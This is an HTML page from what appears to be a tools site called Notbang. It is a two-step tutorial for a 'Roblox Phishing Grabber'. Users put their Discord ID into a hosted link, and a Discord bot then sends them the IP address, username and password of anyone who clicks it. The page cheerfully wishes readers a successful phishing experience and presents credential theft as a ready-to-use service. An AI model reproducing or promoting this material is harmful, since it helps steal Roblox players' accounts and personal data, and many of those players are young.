<!DOCTYPE html>
<html>
<head>
    <title>Notbang™ | Fake Links</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background: url('https://cdn.discordapp.com/attachments/1128409837483606128/1147232250287620127/background.jpg') no-repeat center center fixed;
            background-size: cover;
        }

        .container {
            max-width: 800px;
            padding: 20px;
            background-color: #18191a;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
            border: 2px solid white;
            border-radius: 8px;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            color: #fff;
        }

        .arrow {
            position: fixed;
            top: 20px;
            left: 20px;
            font-size: 40px;
            color: white;
            content: "◄";
            text-decoration: none;
            line-height: 1;
            z-index: 999;
        }

        .arrow:hover {
            cursor: pointer;
            text-decoration: none;
        }

        .arrow:active { /* Add this CSS for the :active state */
            text-decoration: none;
        }

        h1, h2 {
            color: #fff;
        }

        p {
            color: #ccc;
            line-height: 1.5;
        }

        a {
            color: #007bff;
            text-decoration: none;
        }

        a:hover {
            text-decoration: none;
        }

        .gradient-container {
            background: linear-gradient(90deg, rgba(64, 57, 57, 1) 0%, rgba(23, 22, 22, 1) 100%);
            padding: 20px;
            border-radius: 8px;
            margin-top: 20px;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
        }

        @media (max-width: 768px) {
            .container {
                width: 90%;
                left: 5%;
            }

            .arrow {
                font-size: 30px;
            }
        }
    </style>
</head>
<body>
    <a class="arrow" href="https://webserver.xolo2.repl.co/tools">◄</a>
    <div class="container">
        <h1>How to Use the Roblox Phishing Grabber</h1>
        <p>Welcome to the Roblox Phishing Grabber Tutorial!</p>

        <div class="gradient-container">
            <h2>Step 1: Edit the Link</h2>
            <p>Edit the following link with your Discord ID: https://webserver.xolo2.repl.co/roblox/yourdiscordid</p>
        </div>
      
        <div class="gradient-container">
            <h2>Step 2: Discord Bot Interaction</h2>
            <p>After clicking the link, a Discord bot will automatically send you the IP address, along with the username and password. Ensure you have the necessary permissions to interact with the bot.</p>
        </div>

        <p>Have a successful Roblox phishing grabbing experience!</p>
    </div>
</body>
</html>
